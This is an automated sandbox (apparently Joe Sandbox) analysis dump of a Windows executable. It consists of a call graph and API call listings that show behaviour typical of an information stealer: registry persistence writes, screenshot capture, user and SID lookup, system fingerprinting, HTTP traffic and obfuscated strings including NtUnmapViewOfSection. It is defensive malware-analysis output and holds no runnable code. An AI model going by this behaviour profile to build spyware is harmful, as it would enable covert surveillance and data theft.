32324 cbc01e _AnonymousOriginator 32322->32324 32323 cd3190 70 API calls 32325 cbc112 32323->32325 32324->32323 32324->32369 32326 cb61f0 114 API calls 32325->32326 32327 cbc11a 32326->32327 32328 cba270 115 API calls 32327->32328 32329 cbc12e 32328->32329 32330 cd5590 27 API calls 32329->32330 32331 cbc13f GetFileAttributesA 32330->32331 32332 cbc158 _AnonymousOriginator 32331->32332 32333 cd3190 70 API calls 32332->32333 32332->32369 32334 cbc24c 32333->32334 32335 cb61f0 114 API calls 32334->32335 32336 cbc254 32335->32336 32337 cba270 115 API calls 32336->32337 32338 cbc268 32337->32338 32339 cd5590 27 API calls 32338->32339 32340 cbc279 GetFileAttributesA 32339->32340 32341 cbc292 _AnonymousOriginator 32340->32341 32342 cd3190 70 API calls 32341->32342 32341->32369 32343 cbc386 32342->32343 32344 cb61f0 114 API calls 32343->32344 32345 cbc38e 32344->32345 32346 cba270 115 API calls 32345->32346 32347 cbc3a2 32346->32347 32348 cd5590 27 API calls 32347->32348 32349 cbc3b3 GetFileAttributesA 32348->32349 32350 cbc3cc _AnonymousOriginator 32349->32350 32351 cd3190 70 API calls 32350->32351 32350->32369 32352 cbc4c0 32351->32352 32353 cb61f0 114 API calls 32352->32353 32354 cbc4cb 32353->32354 32355 cba270 115 API calls 32354->32355 32356 cbc4e2 32355->32356 32357 cd5590 27 API calls 32356->32357 32358 cbc4f3 GetFileAttributesA 32357->32358 32359 cbc50c _AnonymousOriginator 32358->32359 32360 cb93d0 124 API calls 32359->32360 32359->32369 32361 cbc61a 32360->32361 32362 cb93d0 124 API calls 32361->32362 32361->32369 32363 cbc624 32362->32363 32364 cb93d0 124 API calls 32363->32364 32363->32369 32365 cbc62e 32364->32365 32366 cb93d0 124 API calls 32365->32366 32365->32369 32367 cbc638 32366->32367 32368 cb93d0 124 API calls 32367->32368 32367->32369 32368->32369 32369->32260 32371 cb9e46 32370->32371 32372 cb9e78 _AnonymousOriginator 32371->32372 32375 cb9e93 32371->32375 32373 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32372->32373 32374 cb9e8f 32373->32374 32374->31619 32376 cdee79 25 API calls 32375->32376 32377 cb9e98 32376->32377 32379 cd4759 32378->32379 32380 cd476d _Yarn 32379->32380 32430 cd5310 27 API calls 3 library calls 32379->32430 32380->31676 32382->31734 32383->31737 32384->32106 32387 cb9436 GetVersionExW 32386->32387 32387->32110 32387->32155 32388->32153 32389->32158 32390->32172 32391->32186 32392->32200 32394 cd2e7b 32393->32394 32406 cd2f64 _Yarn _AnonymousOriginator 32393->32406 32395 cd2ff1 32394->32395 32398 cd2eea 32394->32398 32399 cd2f11 32394->32399 32405 cd2efb _Yarn 32394->32405 32394->32406 32411 cb26a0 27 API calls 32395->32411 32397 cd2ff6 32412 cb25c0 27 API calls 2 library calls 32397->32412 32398->32397 32409 cb25c0 27 API calls 4 library calls 32398->32409 32399->32405 32410 cb25c0 27 API calls 4 library calls 32399->32410 32401 cd2ffb 32404 cdee79 25 API calls 32404->32395 32405->32404 32405->32406 32406->32243 32407->32240 32409->32405 32410->32405 32412->32401 32414 cd3190 70 API calls 32413->32414 32415 cba2cc 32414->32415 32416 cb61f0 114 API calls 32415->32416 32417 cba2d7 32416->32417 32418 cd40a0 27 API calls 32417->32418 32419 cba32d 32418->32419 32420 cd40a0 27 API calls 32419->32420 32421 cba389 32420->32421 32422 cd5590 27 API calls 32421->32422 32427 cba3a2 _AnonymousOriginator 32422->32427 32423 cba465 32426 cdee79 25 API calls 32423->32426 32424 cba43e _AnonymousOriginator 32425 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32424->32425 32428 cba461 32425->32428 32429 cba46a 32426->32429 32427->32423 32427->32424 32428->32252 32430->32380 32433 cd0b70 32431->32433 32432 cd3190 70 API calls 32432->32433 32433->32432 32434 cb61f0 114 API calls 32433->32434 32437 cceaf0 32433->32437 32434->32433 32438 cceb2c 32437->32438 32440 ccf21e _AnonymousOriginator 32437->32440 32438->32440 32441 cd3190 70 API calls 32438->32441 32439 ccf294 _AnonymousOriginator 32443 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32439->32443 32440->32439 32444 ccf2f1 32440->32444 32442 cceb4d 32441->32442 32445 cb61f0 114 API calls 32442->32445 32447 ccf2b6 Sleep 32443->32447 32446 cdee79 25 API calls 32444->32446 32448 cceb54 32445->32448 32449 ccf2f6 32446->32449 32447->32433 32450 cd3190 70 API calls 32448->32450 32451 cceb66 32450->32451 32452 cd3190 70 API calls 32451->32452 32453 cceb78 32452->32453 32559 cc05b0 32453->32559 32456 cd3190 70 API calls 32457 cceb99 32456->32457 32458 cd3190 70 API calls 32457->32458 32459 ccebb1 32458->32459 32460 cb61f0 114 API calls 32459->32460 32461 ccebb8 32460->32461 32590 cb9c20 32461->32590 32464 ccee39 32466 cd3190 70 API calls 32464->32466 32524 ccf2d8 32464->32524 32465 cd3190 70 API calls 32467 ccebe0 32465->32467 32468 ccee6b 32466->32468 32469 cd3190 70 API calls 32467->32469 32470 cd3190 70 API calls 32468->32470 32471 ccebf8 32469->32471 32472 ccee80 32470->32472 32473 cb61f0 114 API calls 32471->32473 32474 cd3190 70 API calls 32472->32474 32475 ccebff 32473->32475 32476 ccee92 32474->32476 32477 cb9c20 27 API calls 32475->32477 32478 cc05b0 121 API calls 32476->32478 32479 ccec0b 32477->32479 32480 ccee9e 32478->32480 32479->32464 32483 cd3190 70 API calls 32479->32483 32481 cd3190 70 API calls 32480->32481 32482 cceeb3 32481->32482 32484 cd3190 70 API calls 32482->32484 32485 ccec28 32483->32485 32486 cceecb 32484->32486 32487 cb61f0 114 API calls 32485->32487 32488 cb61f0 114 API calls 32486->32488 32491 ccec30 32487->32491 32489 cceed2 32488->32489 32490 cb9c20 27 API calls 32489->32490 32492 cceede 32490->32492 32493 cd40a0 27 API calls 32491->32493 32494 cd3190 70 API calls 32492->32494 32498 ccf1ab _AnonymousOriginator 32492->32498 32495 ccec9e 32493->32495 32496 cceefa 32494->32496 32499 cd30d0 25 API calls 32495->32499 32500 cd3190 70 API calls 32496->32500 32497 ccf2ec 32501 cdee79 25 API calls 32497->32501 32498->32440 32498->32497 32507 ccecaa _AnonymousOriginator 32499->32507 32502 ccef12 32500->32502 32501->32444 32503 cb61f0 114 API calls 32502->32503 32504 ccef19 32503->32504 32506 cb9c20 27 API calls 32504->32506 32505 cd3190 70 API calls 32508 cced25 32505->32508 32509 ccef25 32506->32509 32507->32505 32510 cb61f0 114 API calls 32508->32510 32509->32498 32511 cd3190 70 API calls 32509->32511 32514 cced2d 32510->32514 32512 ccef42 32511->32512 32513 cb61f0 114 API calls 32512->32513 32517 ccef4a 32513->32517 32515 cd40a0 27 API calls 32514->32515 32516 cced8b 32515->32516 32518 cd30d0 25 API calls 32516->32518 32519 ccef9b 32517->32519 32520 ccf2d3 32517->32520 32527 cced97 _AnonymousOriginator 32518->32527 32521 cd40a0 27 API calls 32519->32521 32605 cd45b0 27 API calls 32520->32605 32523 ccefb8 32521->32523 32525 cd30d0 25 API calls 32523->32525 32606 cd84ec 27 API calls 2 library calls 32524->32606 32535 ccefc4 _AnonymousOriginator 32525->32535 32527->32464 32602 cbb5f0 114 API calls 3 library calls 32527->32602 32529 ccf2e2 32530 cdee79 25 API calls 32529->32530 32532 ccf2e7 32530->32532 32531 ccee11 32531->32464 32603 ce10b2 14 API calls __dosmaperr 32531->32603 32536 cdee79 25 API calls 32532->32536 32533 ccf026 _AnonymousOriginator 32537 cd3190 70 API calls 32533->32537 32535->32529 32535->32533 32536->32497 32539 ccf03f 32537->32539 32538 ccee1a 32540 ce19e7 40 API calls 32538->32540 32541 cb61f0 114 API calls 32539->32541 32540->32464 32542 ccf047 32541->32542 32543 cd40a0 27 API calls 32542->32543 32544 ccf0a5 32543->32544 32545 cd30d0 25 API calls 32544->32545 32548 ccf0b1 _AnonymousOriginator 32545->32548 32546 ccf113 _AnonymousOriginator 32547 cd3190 70 API calls 32546->32547 32549 ccf12e 32547->32549 32548->32532 32548->32546 32550 cd3190 70 API calls 32549->32550 32551 ccf143 32550->32551 32552 cd3190 70 API calls 32551->32552 32553 ccf15e 32552->32553 32554 cb61f0 114 API calls 32553->32554 32555 ccf165 32554->32555 32556 cd40a0 27 API calls 32555->32556 32557 ccf1a2 32556->32557 32604 cce6c0 114 API calls 2 library calls 32557->32604 32560 cc0a07 32559->32560 32561 cc0602 32559->32561 32562 cd40a0 27 API calls 32560->32562 32561->32560 32563 cc0616 Sleep InternetOpenW InternetConnectA 32561->32563 32567 cc09b4 _AnonymousOriginator 32562->32567 32564 cd3190 70 API calls 32563->32564 32565 cc06a2 32564->32565 32569 cb61f0 114 API calls 32565->32569 32566 cc0adb 32570 cdee79 25 API calls 32566->32570 32567->32566 32568 cc0a02 _AnonymousOriginator 32567->32568 32571 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32568->32571 32574 cc06ad HttpOpenRequestA 32569->32574 32575 cc0ae0 32570->32575 32572 cc0ac8 32571->32572 32572->32456 32576 cc06d6 _AnonymousOriginator 32574->32576 32577 cd3190 70 API calls 32576->32577 32578 cc073e 32577->32578 32579 cb61f0 114 API calls 32578->32579 32580 cc0749 32579->32580 32581 cd3190 70 API calls 32580->32581 32582 cc0762 32581->32582 32583 cb61f0 114 API calls 32582->32583 32584 cc076d HttpSendRequestA 32583->32584 32586 cc0790 _AnonymousOriginator 32584->32586 32587 cc0818 InternetReadFile 32586->32587 32588 cc083f _Yarn 32587->32588 32589 cc08bf InternetReadFile 32588->32589 32589->32588 32595 cb9d43 _AnonymousOriginator 32590->32595 32601 cb9c7c _AnonymousOriginator 32590->32601 32591 cb9e0a 32607 cd45b0 27 API calls 32591->32607 32592 cd40a0 27 API calls 32592->32601 32594 cb9e0f 32597 cdee79 25 API calls 32594->32597 32595->32594 32596 cb9de3 _AnonymousOriginator 32595->32596 32598 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32596->32598 32599 cb9e14 32597->32599 32600 cb9e06 32598->32600 32600->32464 32600->32465 32601->32591 32601->32592 32601->32594 32601->32595 32602->32531 32603->32538 32604->32498 32608 ce0482 32609 ce049e 32608->32609 32610 ce0490 32608->32610 32621 cde769 32609->32621 32612 ce04f4 57 API calls 32610->32612 32613 ce049a 32612->32613 32618 ce04cc 32620 ce04ee 32618->32620 32652 ce8006 32618->32652 32622 cde047 __cftoe 37 API calls 32621->32622 32623 cde77b 32622->32623 32625 cde78d 32623->32625 32658 ce865f 5 API calls std::_Lockit::_Lockit 32623->32658 32626 cde74c 32625->32626 32659 cde69a 32626->32659 32629 ce04f4 32630 ce051f __fread_nolock 32629->32630 32631 ce0502 32629->32631 32635 ce0545 32630->32635 32636 ce0561 CreateFileW 32630->32636 32710 ce109f 14 API calls __dosmaperr 32631->32710 32633 ce0507 32711 ce10b2 14 API calls __dosmaperr 32633->32711 32713 ce109f 14 API calls __dosmaperr 32635->32713 32639 ce0585 32636->32639 32640 ce0593 32636->32640 32637 ce050f 32712 cdee69 25 API calls __cftoe 32637->32712 32684 ce065c GetFileType 32639->32684 32716 ce05d2 49 API calls __dosmaperr 32640->32716 32644 ce054a 32714 ce10b2 14 API calls __dosmaperr 32644->32714 32645 ce051a 32645->32618 32647 ce058e __fread_nolock 32650 ce055c 32647->32650 32651 ce05c4 CloseHandle 32647->32651 32648 ce0551 32715 cdee69 25 API calls __cftoe 32648->32715 32650->32618 32651->32650 32653 ce8011 HeapFree 32652->32653 32657 ce803a __dosmaperr 32652->32657 32654 ce8026 32653->32654 32653->32657 32742 ce10b2 14 API calls __dosmaperr 32654->32742 32656 ce802c GetLastError 32656->32657 32657->32620 32658->32625 32660 cde6a8 32659->32660 32661 cde6c2 32659->32661 32677 cde7a8 14 API calls _free 32660->32677 32663 cde6c9 32661->32663 32664 cde6e8 32661->32664 32669 cde6b2 32663->32669 32678 cde7c2 15 API calls __wsopen_s 32663->32678 32679 ce8283 MultiByteToWideChar 32664->32679 32666 cde6f7 32668 cde6fe GetLastError 32666->32668 32671 cde724 32666->32671 32682 cde7c2 15 API calls __wsopen_s 32666->32682 32680 ce107c 14 API calls __dosmaperr 32668->32680 32669->32618 32669->32629 32671->32669 32683 ce8283 MultiByteToWideChar 32671->32683 32672 cde70a 32681 ce10b2 14 API calls __dosmaperr 32672->32681 32676 cde73b 32676->32668 32676->32669 32677->32669 32678->32669 32679->32666 32680->32672 32681->32669 32682->32671 32683->32676 32685 ce0749 32684->32685 32686 ce0697 32684->32686 32687 ce0775 32685->32687 32689 ce0753 32685->32689 32688 ce06b1 __fread_nolock 32686->32688 32734 ce09d2 21 API calls __dosmaperr 32686->32734 32690 ce079f PeekNamedPipe 32687->32690 32700 ce0740 32687->32700 32694 ce06d0 GetFileInformationByHandle 32688->32694 32688->32700 32692 ce0766 GetLastError 32689->32692 32693 ce0757 32689->32693 32690->32700 32737 ce107c 14 API calls __dosmaperr 32692->32737 32736 ce10b2 14 API calls __dosmaperr 32693->32736 32694->32692 32696 ce06e6 32694->32696 32717 ce0924 32696->32717 32698 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32699 ce07ca 32698->32699 32699->32647 32700->32698 32705 ce07cc 7 API calls 32706 ce0716 32705->32706 32707 ce07cc 7 API calls 32706->32707 32708 ce072d 32707->32708 32735 ce08f1 14 API calls __dosmaperr 32708->32735 32710->32633 32711->32637 32712->32645 32713->32644 32714->32648 32715->32650 32716->32647 32718 ce093a 32717->32718 32726 ce06f2 32718->32726 32738 cde156 38 API calls 3 library calls 32718->32738 32720 ce097e 32720->32726 32739 cde156 38 API calls 3 library calls 32720->32739 32722 ce098f 32722->32726 32740 cde156 38 API calls 3 library calls 32722->32740 32724 ce09a0 32724->32726 32741 cde156 38 API calls 3 library calls 32724->32741 32727 ce07cc 32726->32727 32728 ce07e4 32727->32728 32729 ce07f2 FileTimeToSystemTime 32727->32729 32728->32729 32732 ce07ea 32728->32732 32730 ce0804 SystemTimeToTzSpecificLocalTime 32729->32730 32729->32732 32730->32732 32731 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32733 ce0703 32731->32733 32732->32731 32733->32705 32734->32688 32735->32700 32736->32700 32737->32700 32738->32720 32739->32722 32740->32724 32741->32726 32742->32656 32743 cea3c3 32744 cea566 32743->32744 32746 cea3ed 32743->32746 32794 ce10b2 14 API calls __dosmaperr 32744->32794 32746->32744 32749 cea438 32746->32749 32747 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32748 cea583 32747->32748 32764 ceed00 32749->32764 32753 cea46c 32754 cea585 32753->32754 32779 cee3e5 32753->32779 32755 cdee96 __Getctype 11 API calls 32754->32755 32758 cea591 32755->32758 32757 cea47e 32757->32754 32786 cee411 32757->32786 32760 cea490 32760->32754 32761 cea499 32760->32761 32762 cea551 32761->32762 32793 ceed5d 25 API calls 2 library calls 32761->32793 32762->32747 32765 ceed0c __FrameHandler3::FrameUnwindToState 32764->32765 32766 cea458 32765->32766 32795 ce2540 EnterCriticalSection 32765->32795 32772 cee3b9 32766->32772 32768 ceed1d 32771 ceed31 32768->32771 32796 ceebd9 32768->32796 32816 ceed54 LeaveCriticalSection std::_Lockit::~_Lockit 32771->32816 32773 cee3da 32772->32773 32774 cee3c5 32772->32774 32773->32753 32931 ce10b2 14 API calls __dosmaperr 32774->32931 32776 cee3ca 32932 cdee69 25 API calls __cftoe 32776->32932 32778 cee3d5 32778->32753 32780 cee406 32779->32780 32781 cee3f1 32779->32781 32780->32757 32933 ce10b2 14 API calls __dosmaperr 32781->32933 32783 cee3f6 32934 cdee69 25 API calls __cftoe 32783->32934 32785 cee401 32785->32757 32787 cee41d 32786->32787 32788 cee432 32786->32788 32935 ce10b2 14 API calls __dosmaperr 32787->32935 32788->32760 32790 cee422 32936 cdee69 25 API calls __cftoe 32790->32936 32792 cee42d 32792->32760 32793->32762 32794->32762 32795->32768 32797 ceec25 32796->32797 32798 ceec2c 32797->32798 32799 ceec3d 32797->32799 32801 ceeca3 32798->32801 32803 ceec9a 32798->32803 32918 ce8235 15 API calls 2 library calls 32799->32918 32804 ceeca0 32801->32804 32879 ceea7f 32801->32879 32802 ceec4b 32813 ceec7a 32802->32813 32814 ceec52 32802->32814 32817 cee7de 32803->32817 32807 ce8006 _free 14 API calls 32804->32807 32808 ceecae 32807->32808 32809 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32808->32809 32811 ceecbc 32809->32811 32810 ce8006 _free 14 API calls 32812 ceec58 32810->32812 32811->32771 32812->32798 32815 ce8006 _free 14 API calls 32813->32815 32814->32810 32815->32812 32816->32766 32818 cee7ee 32817->32818 32819 cee411 25 API calls 32818->32819 32820 cee80d 32819->32820 32821 ceea74 32820->32821 32822 cee3b9 25 API calls 32820->32822 32823 cdee96 __Getctype 11 API calls 32821->32823 32824 cee81f 32822->32824 32825 ceea7e 32823->32825 32824->32821 32826 cee879 32824->32826 32829 ceea6d 32824->32829 32828 cee411 25 API calls 32825->32828 32919 ce8235 15 API calls 2 library calls 32826->32919 32831 ceeaac 32828->32831 32829->32804 32830 cee88a 32832 ce8006 _free 14 API calls 32830->32832 32878 ceea4f 32830->32878 32833 ceebce 32831->32833 32837 cee3b9 25 API calls 32831->32837 32835 cee8a0 32832->32835 32836 cdee96 __Getctype 11 API calls 32833->32836 32834 ce8006 _free 14 API calls 32838 ceea6c 32834->32838 32920 cec4b9 25 API calls 2 library calls 32835->32920 32844 ceebd8 32836->32844 32839 ceeabe 32837->32839 32838->32829 32839->32833 32840 cee3e5 25 API calls 32839->32840 32842 ceead0 32840->32842 32842->32833 32845 ceead9 32842->32845 32843 cee8ce 32846 cee8d9 __fread_nolock 32843->32846 32847 ceea72 32843->32847 32848 ceec2c 32844->32848 32850 ceec3d 32844->32850 32849 ce8006 _free 14 API calls 32845->32849 32921 cee797 42 API calls 6 library calls 32846->32921 32847->32821 32853 ceeca3 32848->32853 32855 ceec9a 32848->32855 32852 ceeae4 GetTimeZoneInformation 32849->32852 32926 ce8235 15 API calls 2 library calls 32850->32926 32868 ceeba8 32852->32868 32870 ceeb00 __fread_nolock 32852->32870 32856 ceea7f 41 API calls 32853->32856 32859 ceeca0 32853->32859 32854 ceec4b 32865 ceec7a 32854->32865 32866 ceec52 32854->32866 32857 cee7de 41 API calls 32855->32857 32856->32859 32857->32859 32858 ce8006 _free 14 API calls 32860 ceecae 32858->32860 32859->32858 32861 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32860->32861 32863 ceecbc 32861->32863 32862 ce8006 _free 14 API calls 32864 ceec58 32862->32864 32863->32804 32864->32848 32867 ce8006 _free 14 API calls 32865->32867 32866->32862 32867->32864 32868->32804 32923 ce2867 37 API calls __Getctype 32870->32923 32872 ceeb83 32924 ceecbe 42 API calls 4 library calls 32872->32924 32874 ceeb94 32925 ceecbe 42 API calls 4 library calls 32874->32925 32877 cee924 32877->32878 32922 cee797 42 API calls 6 library calls 32877->32922 32878->32834 32880 ceea8f 32879->32880 32881 cee411 25 API calls 32880->32881 32882 ceeaac 32881->32882 32883 ceebce 32882->32883 32885 cee3b9 25 API calls 32882->32885 32884 cdee96 __Getctype 11 API calls 32883->32884 32889 ceebd8 32884->32889 32886 ceeabe 32885->32886 32886->32883 32887 cee3e5 25 API calls 32886->32887 32888 ceead0 32887->32888 32888->32883 32890 ceead9 32888->32890 32891 ceec2c 32889->32891 32893 ceec3d 32889->32893 32892 ce8006 _free 14 API calls 32890->32892 32896 ceeca3 32891->32896 32897 ceec9a 32891->32897 32895 ceeae4 GetTimeZoneInformation 32892->32895 32930 ce8235 15 API calls 2 library calls 32893->32930 32911 ceeba8 32895->32911 32912 ceeb00 __fread_nolock 32895->32912 32898 ceeca0 32896->32898 32899 ceea7f 41 API calls 32896->32899 32901 cee7de 41 API calls 32897->32901 32902 ce8006 _free 14 API calls 32898->32902 32899->32898 32900 ceec52 32905 ce8006 _free 14 API calls 32900->32905 32901->32898 32903 ceecae 32902->32903 32904 cd9810 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 32903->32904 32907 ceecbc 32904->32907 32908 ceec58 32905->32908 32906 ceec4b 32906->32900 32909 ceec7a 32906->32909 32907->32804 32908->32891 32910 ce8006 _free 14 API calls 32909->32910 32910->32908 32911->32804 32927 ce2867 37 API calls __Getctype 32912->32927 32914 ceeb83 32928 ceecbe 42 API calls 4 library calls 32914->32928 32916 ceeb94 32929 ceecbe 42 API calls 4 library calls 32916->32929 32918->32802 32919->32830 32920->32843 32921->32877 32922->32878 32923->32872 32924->32874 32925->32868 32926->32854 32927->32914 32928->32916 32929->32911 32930->32906 32931->32776 32932->32778 32933->32783 32934->32785 32935->32790 32936->32792
                APIs
                • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
                • RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
                • RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6
                • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
                • RegCloseKey.ADVAPI32(80000001), ref: 00CB651A
                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
                • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD
                  • Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894
                  • Part of subcall function 00CB61F0: RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00CB68E0
                • RegCloseKey.ADVAPI32(80000002), ref: 00CB6668
                • RegCloseKey.ADVAPI32(?), ref: 00CB6D5E
                • GdiplusStartup.GDIPLUS(?,?,00000000,79C85444,00000000), ref: 00CB6DEA
                • GetDC.USER32(00000000), ref: 00CB6F62
                • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB71CD
                • GetSystemMetrics.USER32(00000000), ref: 00CB7226
                • GetSystemMetrics.USER32(00000000), ref: 00CB722F
                • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00CB7277
                • GetSystemMetrics.USER32(00000001), ref: 00CB72CA
                • GetSystemMetrics.USER32(00000001), ref: 00CB72D3
                • CreateCompatibleDC.GDI32(?), ref: 00CB72DF
                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CB72F4
                • SelectObject.GDI32(00000000,00000000), ref: 00CB7304
                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CB732A
                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 00CB733E
                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00CB735A
                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00CB7387
                • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 00CB740E
                • SelectObject.GDI32(00000000,?), ref: 00CB741B
                • DeleteObject.GDI32(00000000), ref: 00CB7428
                • DeleteObject.GDI32(?), ref: 00CB7430
                • ReleaseDC.USER32(00000000,?), ref: 00CB743A
                • GdipDisposeImage.GDIPLUS(00000000), ref: 00CB7441
                • GdiplusShutdown.GDIPLUS(?), ref: 00CB74E3
                • GetUserNameA.ADVAPI32(?,?), ref: 00CB75BA
                • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB7600
                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB760D
                • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7721
                • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB7748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                • String ID: $($1IuuEzp=$NXVq6M==$NtUnmapViewOfSection$PXPq6M==$QIuuEzpUR20=$QIuuEzpURTm=$QIuuEzpURjK=$QIuuEzpURjO=$YDUj4DJn$ZrfiRSYDWA==$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                • API String ID: 1729688432-2329694862
                • Opcode ID: e1126614b3e19621e41824e6eeafc13909a1739ad841fba58b242ff538f193d1
                • Instruction ID: c7529d5ca63abb166aff36d220b26a2ad34af9d4116cbaad83c188720ec67f2c
                • Opcode Fuzzy Hash: e1126614b3e19621e41824e6eeafc13909a1739ad841fba58b242ff538f193d1
                • Instruction Fuzzy Hash: F3D20471A002189BDF18DF68CC85BEDBB75EF84300F508299F519E7292DB359A85CFA1
                APIs
                  • Part of subcall function 00CBA270: GetTempPathA.KERNEL32(00000104,?,79C85444,?,00000000), ref: 00CBA2B7
                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00CBB77B
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
                  • Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
                  • Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBB8B5
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBB9EF
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
                  • Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
                  • Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000001), ref: 00CB651A
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBB29
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBC63
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
                  • Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F
                  • Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000002), ref: 00CB6668
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBD9D
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBED7
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC011
                  • Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894
                  • Part of subcall function 00CB61F0: RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00CB68E0
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC14B
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC285
                • GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC3BF
                  • Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(?), ref: 00CB6D5E
                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00CBC4FF
                  • Part of subcall function 00CB93D0: GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
                  • Part of subcall function 00CB93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
                  • Part of subcall function 00CB93D0: GetProcAddress.KERNEL32(00000000), ref: 00CB94B2
                  • Part of subcall function 00CB93D0: GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573
                  • Part of subcall function 00CB93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9577
                Strings
                Memory Dump Source
